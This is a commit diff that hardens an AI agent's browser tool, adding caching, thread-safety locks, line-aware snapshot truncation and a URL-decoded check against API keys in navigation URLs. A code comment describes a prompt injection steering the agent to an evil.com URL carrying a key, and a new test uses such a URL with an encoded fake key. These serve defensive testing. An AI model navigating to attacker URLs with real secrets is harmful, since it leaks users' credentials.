fix(browser): hardening — dead code, caching, scroll perf, security, thread safety

Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).

- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)

Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures

Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
This commit is contained in:
kshitijk4poor 2026-04-10 13:00:23 -07:00 committed by Teknium
parent c6e1add6f1
commit 37a1c75716
3 changed files with 406 additions and 64 deletions

View file

@ -0,0 +1,271 @@
"""Tests for browser_tool.py hardening: caching, security, thread safety, truncation."""
import inspect
import os
from unittest.mock import MagicMock, patch
import pytest
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _reset_caches():
"""Reset all module-level caches so tests start clean."""
import tools.browser_tool as bt
bt._cached_agent_browser = None
bt._agent_browser_resolved = False
bt._cached_command_timeout = None
bt._command_timeout_resolved = False
# lru_cache for _discover_homebrew_node_dirs
if hasattr(bt._discover_homebrew_node_dirs, "cache_clear"):
bt._discover_homebrew_node_dirs.cache_clear()
@pytest.fixture(autouse=True)
def _clean_caches():
_reset_caches()
yield
_reset_caches()
# ---------------------------------------------------------------------------
# Dead code removal
# ---------------------------------------------------------------------------
class TestDeadCodeRemoval:
"""Verify dead code was actually removed."""
def test_no_default_session_timeout(self):
import tools.browser_tool as bt
assert not hasattr(bt, "DEFAULT_SESSION_TIMEOUT")
def test_browser_close_schema_removed(self):
from tools.browser_tool import BROWSER_TOOL_SCHEMAS
names = [s["name"] for s in BROWSER_TOOL_SCHEMAS]
assert "browser_close" not in names
# ---------------------------------------------------------------------------
# Caching: _find_agent_browser
# ---------------------------------------------------------------------------
class TestFindAgentBrowserCache:
def test_cached_after_first_call(self):
import tools.browser_tool as bt
with patch("shutil.which", return_value="/usr/bin/agent-browser"):
result1 = bt._find_agent_browser()
result2 = bt._find_agent_browser()
assert result1 == result2 == "/usr/bin/agent-browser"
assert bt._agent_browser_resolved is True
def test_cache_cleared_by_cleanup(self):
import tools.browser_tool as bt
bt._cached_agent_browser = "/fake/path"
bt._agent_browser_resolved = True
bt.cleanup_all_browsers()
assert bt._agent_browser_resolved is False
def test_not_found_cached_raises_on_subsequent(self):
"""After FileNotFoundError, subsequent calls should raise from cache."""
import tools.browser_tool as bt
from pathlib import Path
original_exists = Path.exists
def mock_exists(self):
if "node_modules" in str(self) and "agent-browser" in str(self):
return False
return original_exists(self)
with patch("shutil.which", return_value=None), \
patch("os.path.isdir", return_value=False), \
patch.object(Path, "exists", mock_exists):
with pytest.raises(FileNotFoundError):
bt._find_agent_browser()
# Second call should also raise (from cache)
with pytest.raises(FileNotFoundError, match="cached"):
bt._find_agent_browser()
# ---------------------------------------------------------------------------
# Caching: _get_command_timeout
# ---------------------------------------------------------------------------
class TestCommandTimeoutCache:
def test_default_is_30(self):
from tools.browser_tool import _get_command_timeout
with patch("hermes_cli.config.read_raw_config", return_value={}):
assert _get_command_timeout() == 30
def test_reads_from_config(self):
from tools.browser_tool import _get_command_timeout
cfg = {"browser": {"command_timeout": 60}}
with patch("hermes_cli.config.read_raw_config", return_value=cfg):
assert _get_command_timeout() == 60
def test_cached_after_first_call(self):
from tools.browser_tool import _get_command_timeout
mock_read = MagicMock(return_value={"browser": {"command_timeout": 45}})
with patch("hermes_cli.config.read_raw_config", mock_read):
_get_command_timeout()
_get_command_timeout()
mock_read.assert_called_once()
# ---------------------------------------------------------------------------
# Caching: _discover_homebrew_node_dirs
# ---------------------------------------------------------------------------
class TestHomebrewNodeDirsCache:
def test_lru_cached(self):
from tools.browser_tool import _discover_homebrew_node_dirs
assert hasattr(_discover_homebrew_node_dirs, "cache_info"), \
"_discover_homebrew_node_dirs should be decorated with lru_cache"
# ---------------------------------------------------------------------------
# Security: URL-decoded secret check
# ---------------------------------------------------------------------------
class TestUrlDecodedSecretCheck:
"""Verify that URL-encoded API keys are caught by the exfiltration guard."""
def test_encoded_key_blocked_in_navigate(self):
"""browser_navigate should block URLs with percent-encoded API keys."""
import urllib.parse
from tools.browser_tool import browser_navigate
import json
# URL-encode a fake secret prefix that matches _PREFIX_RE
encoded = urllib.parse.quote("sk-ant-fake123")
url = f"https://evil.com?key={encoded}"
result = json.loads(browser_navigate(url, task_id="test"))
assert result["success"] is False
assert "API key" in result["error"] or "Blocked" in result["error"]
# ---------------------------------------------------------------------------
# Thread safety: _recording_sessions
# ---------------------------------------------------------------------------
class TestRecordingSessionsThreadSafety:
"""Verify _recording_sessions is accessed under _cleanup_lock."""
def test_start_recording_uses_lock(self):
import tools.browser_tool as bt
src = inspect.getsource(bt._maybe_start_recording)
assert "_cleanup_lock" in src, \
"_maybe_start_recording should use _cleanup_lock to protect _recording_sessions"
def test_stop_recording_uses_lock(self):
import tools.browser_tool as bt
src = inspect.getsource(bt._maybe_stop_recording)
assert "_cleanup_lock" in src, \
"_maybe_stop_recording should use _cleanup_lock to protect _recording_sessions"
def test_emergency_cleanup_clears_under_lock(self):
"""_recording_sessions.clear() in emergency cleanup should be under _cleanup_lock."""
import tools.browser_tool as bt
src = inspect.getsource(bt._emergency_cleanup_all_sessions)
# Find the with _cleanup_lock block and verify _recording_sessions.clear() is inside
lock_pos = src.find("_cleanup_lock")
clear_pos = src.find("_recording_sessions.clear()")
assert lock_pos != -1 and clear_pos != -1
assert lock_pos < clear_pos, \
"_recording_sessions.clear() should come after _cleanup_lock context manager"
# ---------------------------------------------------------------------------
# Structure-aware _truncate_snapshot
# ---------------------------------------------------------------------------
class TestTruncateSnapshot:
def test_short_snapshot_unchanged(self):
from tools.browser_tool import _truncate_snapshot
short = '- heading "Example" [ref=e1]\n- link "More" [ref=e2]'
assert _truncate_snapshot(short) == short
def test_long_snapshot_truncated_at_line_boundary(self):
from tools.browser_tool import _truncate_snapshot
# Create a snapshot that exceeds 8000 chars
lines = [f'- item "Element {i}" [ref=e{i}]' for i in range(500)]
snapshot = "\n".join(lines)
assert len(snapshot) > 8000
result = _truncate_snapshot(snapshot, max_chars=200)
assert len(result) <= 300 # some margin for the truncation note
assert "truncated" in result.lower()
# Every line in the result should be complete (not cut mid-element)
for line in result.split("\n"):
if line.strip() and "truncated" not in line.lower():
assert line.startswith("- item") or line == ""
def test_truncation_reports_remaining_count(self):
from tools.browser_tool import _truncate_snapshot
lines = [f"- line {i}" for i in range(100)]
snapshot = "\n".join(lines)
result = _truncate_snapshot(snapshot, max_chars=200)
# Should mention how many lines were truncated
assert "more line" in result.lower()
# ---------------------------------------------------------------------------
# Scroll optimization
# ---------------------------------------------------------------------------
class TestScrollOptimization:
def test_agent_browser_path_uses_pixel_scroll(self):
"""Verify agent-browser path uses single pixel-based scroll, not 5x loop."""
import tools.browser_tool as bt
src = inspect.getsource(bt.browser_scroll)
assert "_SCROLL_PIXELS" in src, \
"browser_scroll should use _SCROLL_PIXELS for agent-browser path"
# ---------------------------------------------------------------------------
# Empty stdout = failure
# ---------------------------------------------------------------------------
class TestEmptyStdoutFailure:
def test_empty_stdout_returns_failure(self):
"""Verify _run_browser_command returns failure on empty stdout."""
import tools.browser_tool as bt
src = inspect.getsource(bt._run_browser_command)
assert "returned no output" in src, \
"_run_browser_command should treat empty stdout as failure"
def test_empty_ok_commands_is_module_level_frozenset(self):
"""_EMPTY_OK_COMMANDS should be a module-level frozenset, not defined inside a function."""
import tools.browser_tool as bt
assert hasattr(bt, "_EMPTY_OK_COMMANDS")
assert isinstance(bt._EMPTY_OK_COMMANDS, frozenset)
assert "close" in bt._EMPTY_OK_COMMANDS
assert "record" in bt._EMPTY_OK_COMMANDS
# ---------------------------------------------------------------------------
# _camofox_eval bug fix
# ---------------------------------------------------------------------------
class TestCamofoxEvalFix:
def test_uses_correct_ensure_tab_signature(self):
"""_camofox_eval should pass task_id string to _ensure_tab, not a session dict."""
import tools.browser_tool as bt
src = inspect.getsource(bt._camofox_eval)
# Should NOT call _get_session at all — _ensure_tab handles it
assert "_get_session" not in src, \
"_camofox_eval should not call _get_session (removed unused import)"
# Should use body= not json_data=
assert "json_data=" not in src, \
"_camofox_eval should use body= kwarg for _post, not json_data="
assert "body=" in src

View file

@ -15,6 +15,19 @@ from tools.browser_tool import (
_SANE_PATH, _SANE_PATH,
check_browser_requirements, check_browser_requirements,
) )
import tools.browser_tool as _bt
@pytest.fixture(autouse=True)
def _clear_browser_caches():
"""Clear lru_cache and manual caches between tests."""
_discover_homebrew_node_dirs.cache_clear()
_bt._cached_agent_browser = None
_bt._agent_browser_resolved = False
yield
_discover_homebrew_node_dirs.cache_clear()
_bt._cached_agent_browser = None
_bt._agent_browser_resolved = False
class TestSanePath: class TestSanePath:
@ -38,7 +51,7 @@ class TestDiscoverHomebrewNodeDirs:
def test_returns_empty_when_no_homebrew(self): def test_returns_empty_when_no_homebrew(self):
"""Non-macOS systems without /opt/homebrew/opt should return empty.""" """Non-macOS systems without /opt/homebrew/opt should return empty."""
with patch("os.path.isdir", return_value=False): with patch("os.path.isdir", return_value=False):
assert _discover_homebrew_node_dirs() == [] assert _discover_homebrew_node_dirs() == ()
def test_finds_versioned_node_dirs(self): def test_finds_versioned_node_dirs(self):
"""Should discover node@20/bin, node@24/bin etc.""" """Should discover node@20/bin, node@24/bin etc."""
@ -68,13 +81,13 @@ class TestDiscoverHomebrewNodeDirs:
with patch("os.path.isdir", return_value=True), \ with patch("os.path.isdir", return_value=True), \
patch("os.listdir", return_value=["node"]): patch("os.listdir", return_value=["node"]):
result = _discover_homebrew_node_dirs() result = _discover_homebrew_node_dirs()
assert result == [] assert result == ()
def test_handles_oserror_gracefully(self): def test_handles_oserror_gracefully(self):
"""Should return empty list if listdir raises OSError.""" """Should return empty list if listdir raises OSError."""
with patch("os.path.isdir", return_value=True), \ with patch("os.path.isdir", return_value=True), \
patch("os.listdir", side_effect=OSError("Permission denied")): patch("os.listdir", side_effect=OSError("Permission denied")):
assert _discover_homebrew_node_dirs() == [] assert _discover_homebrew_node_dirs() == ()
class TestFindAgentBrowser: class TestFindAgentBrowser:

View file

@ -50,6 +50,7 @@ Usage:
""" """
import atexit import atexit
import functools
import json import json
import logging import logging
import os import os
@ -100,27 +101,27 @@ _SANE_PATH = (
) )
def _discover_homebrew_node_dirs() -> list[str]: @functools.lru_cache(maxsize=1)
def _discover_homebrew_node_dirs() -> tuple[str, ...]:
"""Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24). """Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24).
When Node is installed via ``brew install node@24`` and NOT linked into When Node is installed via ``brew install node@24`` and NOT linked into
/opt/homebrew/bin, the binary lives only in /opt/homebrew/opt/node@24/bin/. /opt/homebrew/bin, agent-browser isn't discoverable on the default PATH.
This function discovers those paths so they can be added to subprocess PATH. This function finds those directories so they can be prepended.
""" """
dirs: list[str] = [] dirs: list[str] = []
homebrew_opt = "/opt/homebrew/opt" homebrew_opt = "/opt/homebrew/opt"
if not os.path.isdir(homebrew_opt): if not os.path.isdir(homebrew_opt):
return dirs return tuple(dirs)
try: try:
for entry in os.listdir(homebrew_opt): for entry in os.listdir(homebrew_opt):
if entry.startswith("node") and entry != "node": if entry.startswith("node") and entry != "node":
# e.g. node@20, node@24
bin_dir = os.path.join(homebrew_opt, entry, "bin") bin_dir = os.path.join(homebrew_opt, entry, "bin")
if os.path.isdir(bin_dir): if os.path.isdir(bin_dir):
dirs.append(bin_dir) dirs.append(bin_dir)
except OSError: except OSError:
pass pass
return dirs return tuple(dirs)
# Throttle screenshot cleanup to avoid repeated full directory scans. # Throttle screenshot cleanup to avoid repeated full directory scans.
_last_screenshot_cleanup_by_dir: dict[str, float] = {} _last_screenshot_cleanup_by_dir: dict[str, float] = {}
@ -132,28 +133,39 @@ _last_screenshot_cleanup_by_dir: dict[str, float] = {}
# Default timeout for browser commands (seconds) # Default timeout for browser commands (seconds)
DEFAULT_COMMAND_TIMEOUT = 30 DEFAULT_COMMAND_TIMEOUT = 30
# Default session timeout (seconds)
DEFAULT_SESSION_TIMEOUT = 300
# Max tokens for snapshot content before summarization # Max tokens for snapshot content before summarization
SNAPSHOT_SUMMARIZE_THRESHOLD = 8000 SNAPSHOT_SUMMARIZE_THRESHOLD = 8000
# Commands that legitimately return empty stdout (e.g. close, record).
_EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"})
_cached_command_timeout: Optional[int] = None
_command_timeout_resolved = False
def _get_command_timeout() -> int: def _get_command_timeout() -> int:
"""Return the configured browser command timeout from config.yaml. """Return the configured browser command timeout from config.yaml.
Reads ``config["browser"]["command_timeout"]`` and falls back to Reads ``config["browser"]["command_timeout"]`` and falls back to
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. ``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. Result is
cached after the first call and cleared by ``cleanup_all_browsers()``.
""" """
global _cached_command_timeout, _command_timeout_resolved
if _command_timeout_resolved:
return _cached_command_timeout # type: ignore[return-value]
_command_timeout_resolved = True
result = DEFAULT_COMMAND_TIMEOUT
try: try:
from hermes_cli.config import read_raw_config from hermes_cli.config import read_raw_config
cfg = read_raw_config() cfg = read_raw_config()
val = cfg.get("browser", {}).get("command_timeout") val = cfg.get("browser", {}).get("command_timeout")
if val is not None: if val is not None:
return max(int(val), 5) # Floor at 5s to avoid instant kills result = max(int(val), 5) # Floor at 5s to avoid instant kills
except Exception as e: except Exception as e:
logger.debug("Could not read command_timeout from config: %s", e) logger.debug("Could not read command_timeout from config: %s", e)
return DEFAULT_COMMAND_TIMEOUT _cached_command_timeout = result
return result
def _get_vision_model() -> Optional[str]: def _get_vision_model() -> Optional[str]:
@ -239,6 +251,8 @@ _cached_cloud_provider: Optional[CloudBrowserProvider] = None
_cloud_provider_resolved = False _cloud_provider_resolved = False
_allow_private_urls_resolved = False _allow_private_urls_resolved = False
_cached_allow_private_urls: Optional[bool] = None _cached_allow_private_urls: Optional[bool] = None
_cached_agent_browser: Optional[str] = None
_agent_browser_resolved = False
def _get_cloud_provider() -> Optional[CloudBrowserProvider]: def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
@ -415,7 +429,7 @@ def _emergency_cleanup_all_sessions():
with _cleanup_lock: with _cleanup_lock:
_active_sessions.clear() _active_sessions.clear()
_session_last_activity.clear() _session_last_activity.clear()
_recording_sessions.clear() _recording_sessions.clear()
# Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM # Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM
@ -617,15 +631,6 @@ BROWSER_TOOL_SCHEMAS = [
"required": ["key"] "required": ["key"]
} }
}, },
{
"name": "browser_close",
"description": "Close the browser session and release resources. Call this when done with browser tasks to free up cloud browser session quota.",
"parameters": {
"type": "object",
"properties": {},
"required": []
}
},
{ {
"name": "browser_get_images", "name": "browser_get_images",
"description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.", "description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.",
@ -777,10 +782,26 @@ def _find_agent_browser() -> str:
Raises: Raises:
FileNotFoundError: If agent-browser is not installed FileNotFoundError: If agent-browser is not installed
""" """
global _cached_agent_browser, _agent_browser_resolved
if _agent_browser_resolved:
if _cached_agent_browser is None:
raise FileNotFoundError(
"agent-browser CLI not found (cached). Install it with: "
f"{_browser_install_hint()}\n"
"Or run 'npm install' in the repo root to install locally.\n"
"Or ensure npx is available in your PATH."
)
return _cached_agent_browser
# Note: _agent_browser_resolved is set at each return site below
# (not before the search) to prevent a race where a concurrent thread
# sees resolved=True but _cached_agent_browser is still None.
# Check if it's in PATH (global install) # Check if it's in PATH (global install)
which_result = shutil.which("agent-browser") which_result = shutil.which("agent-browser")
if which_result: if which_result:
_cached_agent_browser = which_result
_agent_browser_resolved = True
return which_result return which_result
# Build an extended search PATH including Homebrew and Hermes-managed dirs. # Build an extended search PATH including Homebrew and Hermes-managed dirs.
@ -800,21 +821,29 @@ def _find_agent_browser() -> str:
extended_path = os.pathsep.join(extra_dirs) extended_path = os.pathsep.join(extra_dirs)
which_result = shutil.which("agent-browser", path=extended_path) which_result = shutil.which("agent-browser", path=extended_path)
if which_result: if which_result:
_cached_agent_browser = which_result
_agent_browser_resolved = True
return which_result return which_result
# Check local node_modules/.bin/ (npm install in repo root) # Check local node_modules/.bin/ (npm install in repo root)
repo_root = Path(__file__).parent.parent repo_root = Path(__file__).parent.parent
local_bin = repo_root / "node_modules" / ".bin" / "agent-browser" local_bin = repo_root / "node_modules" / ".bin" / "agent-browser"
if local_bin.exists(): if local_bin.exists():
return str(local_bin) _cached_agent_browser = str(local_bin)
_agent_browser_resolved = True
return _cached_agent_browser
# Check common npx locations (also search extended dirs) # Check common npx locations (also search extended dirs)
npx_path = shutil.which("npx") npx_path = shutil.which("npx")
if not npx_path and extra_dirs: if not npx_path and extra_dirs:
npx_path = shutil.which("npx", path=os.pathsep.join(extra_dirs)) npx_path = shutil.which("npx", path=os.pathsep.join(extra_dirs))
if npx_path: if npx_path:
return "npx agent-browser" _cached_agent_browser = "npx agent-browser"
_agent_browser_resolved = True
return _cached_agent_browser
# Nothing found — cache the failure so subsequent calls don't re-scan.
_agent_browser_resolved = True
raise FileNotFoundError( raise FileNotFoundError(
"agent-browser CLI not found. Install it with: " "agent-browser CLI not found. Install it with: "
f"{_browser_install_hint()}\n" f"{_browser_install_hint()}\n"
@ -935,7 +964,7 @@ def _run_browser_command(
path_parts = [p for p in existing_path.split(":") if p] path_parts = [p for p in existing_path.split(":") if p]
candidate_dirs = ( candidate_dirs = (
[hermes_node_bin] [hermes_node_bin]
+ _discover_homebrew_node_dirs() + list(_discover_homebrew_node_dirs())
+ [p for p in _SANE_PATH.split(":") if p] + [p for p in _SANE_PATH.split(":") if p]
) )
@ -994,15 +1023,15 @@ def _run_browser_command(
level = logging.WARNING if returncode != 0 else logging.DEBUG level = logging.WARNING if returncode != 0 else logging.DEBUG
logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500]) logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500])
# Log empty output as warning — common sign of broken agent-browser
if not stdout.strip() and returncode == 0:
logger.warning("browser '%s' returned empty stdout with rc=0. "
"cmd=%s stderr=%s",
command, " ".join(cmd_parts[:4]) + "...",
(stderr or "")[:200])
stdout_text = stdout.strip() stdout_text = stdout.strip()
# Empty output with rc=0 is a broken state — treat as failure rather
# than silently returning {"success": True, "data": {}}.
# Some commands (close, record) legitimately return no output.
if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS:
logger.warning("browser '%s' returned empty output (rc=0)", command)
return {"success": False, "error": f"Browser command '{command}' returned no output"}
if stdout_text: if stdout_text:
try: try:
parsed = json.loads(stdout_text) parsed = json.loads(stdout_text)
@ -1114,20 +1143,34 @@ def _extract_relevant_content(
def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str: def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str:
""" """Structure-aware truncation for snapshots.
Simple truncation fallback for snapshots.
Cuts at line boundaries so that accessibility tree elements are never
split mid-line, and appends a note telling the agent how much was
omitted.
Args: Args:
snapshot_text: The snapshot text to truncate snapshot_text: The snapshot text to truncate
max_chars: Maximum characters to keep max_chars: Maximum characters to keep
Returns: Returns:
Truncated text with indicator if truncated Truncated text with indicator if truncated
""" """
if len(snapshot_text) <= max_chars: if len(snapshot_text) <= max_chars:
return snapshot_text return snapshot_text
return snapshot_text[:max_chars] + "\n\n[... content truncated ...]" lines = snapshot_text.split('\n')
result: list[str] = []
chars = 0
for line in lines:
if chars + len(line) + 1 > max_chars - 80: # reserve space for note
break
result.append(line)
chars += len(line) + 1
remaining = len(lines) - len(result)
if remaining > 0:
result.append(f'\n[... {remaining} more lines truncated, use browser_snapshot for full content]')
return '\n'.join(result)
# ============================================================================ # ============================================================================
@ -1148,8 +1191,11 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
# Secret exfiltration protection — block URLs that embed API keys or # Secret exfiltration protection — block URLs that embed API keys or
# tokens in query parameters. A prompt injection could trick the agent # tokens in query parameters. A prompt injection could trick the agent
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets. # into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
# Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...).
import urllib.parse
from agent.redact import _PREFIX_RE from agent.redact import _PREFIX_RE
if _PREFIX_RE.search(url): url_decoded = urllib.parse.unquote(url)
if _PREFIX_RE.search(url) or _PREFIX_RE.search(url_decoded):
return json.dumps({ return json.dumps({
"success": False, "success": False,
"error": "Blocked: URL contains what appears to be an API key or token. " "error": "Blocked: URL contains what appears to be an API key or token. "
@ -1415,13 +1461,15 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
"error": f"Invalid direction '{direction}'. Use 'up' or 'down'." "error": f"Invalid direction '{direction}'. Use 'up' or 'down'."
}, ensure_ascii=False) }, ensure_ascii=False)
# Repeat the scroll 5 times to get meaningful page movement. # Single scroll with pixel amount instead of 5x subprocess calls.
# Most backends scroll ~100px per call, which is barely visible. # agent-browser supports: agent-browser scroll down 500
# 5x gives roughly half a viewport of travel, backend-agnostic. # ~500px is roughly half a viewport of travel.
_SCROLL_REPEATS = 5 _SCROLL_PIXELS = 500
if _is_camofox_mode(): if _is_camofox_mode():
from tools.browser_camofox import camofox_scroll from tools.browser_camofox import camofox_scroll
# Camofox REST API doesn't support pixel args; use repeated calls
_SCROLL_REPEATS = 5
result = None result = None
for _ in range(_SCROLL_REPEATS): for _ in range(_SCROLL_REPEATS):
result = camofox_scroll(direction, task_id) result = camofox_scroll(direction, task_id)
@ -1429,14 +1477,12 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
effective_task_id = task_id or "default" effective_task_id = task_id or "default"
result = None result = _run_browser_command(effective_task_id, "scroll", [direction, str(_SCROLL_PIXELS)])
for _ in range(_SCROLL_REPEATS): if not result.get("success"):
result = _run_browser_command(effective_task_id, "scroll", [direction]) return json.dumps({
if not result.get("success"): "success": False,
return json.dumps({ "error": result.get("error", f"Failed to scroll {direction}")
"success": False, }, ensure_ascii=False)
"error": result.get("error", f"Failed to scroll {direction}")
}, ensure_ascii=False)
return json.dumps({ return json.dumps({
"success": True, "success": True,
@ -1607,11 +1653,11 @@ def _browser_eval(expression: str, task_id: Optional[str] = None) -> str:
def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str: def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
"""Evaluate JS via Camofox's /tabs/{tab_id}/eval endpoint (if available).""" """Evaluate JS via Camofox's /tabs/{tab_id}/eval endpoint (if available)."""
from tools.browser_camofox import _get_session, _ensure_tab, _post from tools.browser_camofox import _ensure_tab, _post
try: try:
session = _get_session(task_id or "default") tab_info = _ensure_tab(task_id or "default")
tab_id = _ensure_tab(session) tab_id = tab_info.get("tab_id") or tab_info.get("id")
resp = _post(f"/tabs/{tab_id}/eval", json_data={"expression": expression}) resp = _post(f"/tabs/{tab_id}/eval", body={"expression": expression})
# Camofox returns the result in a JSON envelope # Camofox returns the result in a JSON envelope
raw_result = resp.get("result") if isinstance(resp, dict) else resp raw_result = resp.get("result") if isinstance(resp, dict) else resp
@ -1641,8 +1687,9 @@ def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
def _maybe_start_recording(task_id: str): def _maybe_start_recording(task_id: str):
"""Start recording if browser.record_sessions is enabled in config.""" """Start recording if browser.record_sessions is enabled in config."""
if task_id in _recording_sessions: with _cleanup_lock:
return if task_id in _recording_sessions:
return
try: try:
from hermes_cli.config import read_raw_config from hermes_cli.config import read_raw_config
hermes_home = get_hermes_home() hermes_home = get_hermes_home()
@ -1662,7 +1709,8 @@ def _maybe_start_recording(task_id: str):
result = _run_browser_command(task_id, "record", ["start", str(recording_path)]) result = _run_browser_command(task_id, "record", ["start", str(recording_path)])
if result.get("success"): if result.get("success"):
_recording_sessions.add(task_id) with _cleanup_lock:
_recording_sessions.add(task_id)
logger.info("Auto-recording browser session %s to %s", task_id, recording_path) logger.info("Auto-recording browser session %s to %s", task_id, recording_path)
else: else:
logger.debug("Could not start auto-recording: %s", result.get("error")) logger.debug("Could not start auto-recording: %s", result.get("error"))
@ -1672,8 +1720,9 @@ def _maybe_start_recording(task_id: str):
def _maybe_stop_recording(task_id: str): def _maybe_stop_recording(task_id: str):
"""Stop recording if one is active for this session.""" """Stop recording if one is active for this session."""
if task_id not in _recording_sessions: with _cleanup_lock:
return if task_id not in _recording_sessions:
return
try: try:
result = _run_browser_command(task_id, "record", ["stop"]) result = _run_browser_command(task_id, "record", ["stop"])
if result.get("success"): if result.get("success"):
@ -1682,7 +1731,8 @@ def _maybe_stop_recording(task_id: str):
except Exception as e: except Exception as e:
logger.debug("Could not stop recording for %s: %s", task_id, e) logger.debug("Could not stop recording for %s: %s", task_id, e)
finally: finally:
_recording_sessions.discard(task_id) with _cleanup_lock:
_recording_sessions.discard(task_id)
def browser_get_images(task_id: Optional[str] = None) -> str: def browser_get_images(task_id: Optional[str] = None) -> str:
@ -2041,6 +2091,14 @@ def cleanup_all_browsers() -> None:
for task_id in task_ids: for task_id in task_ids:
cleanup_browser(task_id) cleanup_browser(task_id)
# Reset cached lookups so they are re-evaluated on next use.
global _cached_agent_browser, _agent_browser_resolved
global _cached_command_timeout, _command_timeout_resolved
_cached_agent_browser = None
_agent_browser_resolved = False
_discover_homebrew_node_dirs.cache_clear()
_cached_command_timeout = None
_command_timeout_resolved = False
# ============================================================================ # ============================================================================